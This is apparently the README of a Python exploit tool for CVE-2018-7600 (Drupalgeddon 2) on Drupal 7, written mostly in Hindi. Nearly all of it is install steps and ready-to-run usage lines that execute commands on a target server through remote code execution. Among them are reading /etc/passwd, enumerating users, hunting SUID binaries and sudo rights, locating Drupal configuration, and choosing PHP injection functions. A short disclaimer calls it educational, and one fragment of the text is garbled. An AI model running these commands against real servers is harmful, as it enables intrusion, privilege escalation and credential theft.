
CVE-2018-7600 (Drupalgeddon 2) के लिए Python शोषण जो Drupal 7 पर दूरस्थ कोड निष्पादन सक्षम करता है, कई इंजेक्शन विधियों और Linux और Windows के लिए पूर्वनिर्धारित कमांड के साथ।
bixi.pybixi.py एक शोषण है जो CVE‑2018‑7600 (Drupalgeddon 2) कमजोरी के लिए है जो Drupal 7 को प्रभावित करता है।
यह एक सहज इंटरफ़ेस और पूर्वनिर्धारित आदेशों के माध्यम से कमजोर Drupal सर्वरों पर रिमोट कमांड निष्पादन (RCE) की अनुमति देता है।
यह सॉफ्टवेयर केवल नियंत्रित वातावरण में शैक्षिक और अनुसंधान उद्देश्यों के लिए है।
"With great power comes great responsibility"
system, , , )passthruexecshell_execgit clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
cd Drupalgeddon2-CVE-2018-7600
# Kali / Debian / Ubuntu
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install requests
# अन्य वितरण
pip3 install requests
chmod +x bixi.py
python3 bixi.py --help
python3 bixi.py <URL> <COMANDO/PALABRA_CLAVE> [INJECTION_TYPE]
# भेद्यता जांचें
python3 bixi.py http://10.99.99.6/drupal/ test
# ऑपरेटिंग सिस्टम का पता लगाएं
python3 bixi.py http://10.99.99.6/drupal/ linux
python3 bixi.py http://10.99.99.6/drupal/ windows
# उपयोगकर्ताओं की गणना करें
python3 bixi.py http://10.99.99.6/drupal/ users_linux
python3 bixi.py http://10.99.99.6/drupal/ net_user
# सिस्टम जानकारी
python3 bixi.py http://10.99.99.6/drupal/ ifconfig
python3 bixi.py http://10.99.99.6/drupal/ ipconfig
# अनुकूलित आदेश
python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"
| आदेश | विवरण |
|---|---|
| linux | सिस्टम जानकारी |
| users_linux | उपयोगकर्ताओं की सूची बनाएं |
| id | उपयोगकर्ता/समूह जानकारी |
| ls | फ़ाइलों की सूची बनाएं |
| ifconfig | नेटवर्क जानकारी |
| find_flag | झंडे खोजें |
| आदेश | विवरण |
|---|---|
| windows | सिस्टम जानकारी |
| net_user | उपयोगकर्ताओं की सूची बनाएं |
| whoami_win | विस्तृत जानकारी |
| ipconfig | नेटवर्क |
| netstat_win | कनेक्शन |
| dir | निर्देशिका सूची बनाएं |
| आदेश | विवरण |
|---|---|
| sudo | sudo विशेषाधिकार जांचें |
| suid | SUID बाइनरी खोजें |
| net_localgroup | स्थानीय समूह |
| drupal_config | कॉन्फ़िगरेशन खोजें |
| drupal_version | Drupal संस्करण प्राप्त करें |
# system (डिफ़ॉल्ट)
python3 bixi.py http://target/ "whoami" system
# passthru
python3 bixi.py http://target/ "whoami" passthru
# exec
python3 bixi.py http://target/ "whoami" exec
# shell_exec
python3 bixi.py http://target/ "whoami" shell_exec
drupalgeddon2-exploit/
│
├── bixi.py
├── README.md
├── requirements.txt
├── examples/
│ ├── linux_commands.txt
│ └── windows_commands.txt
└── screenshots/
├── help_screen.png
└── exploit_success.png
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
डिफ़ॉल्ट मान बदलें (15 सेकंड):
timeout=15
get_command_for_keyword() में commands शब्दकोश संपादित करें
pip3 install requests
# कनेक्टिविटी जांचें
ping TARGET_IP
# Drupal पथ जांचें
curl http://TARGET_IP/drupal/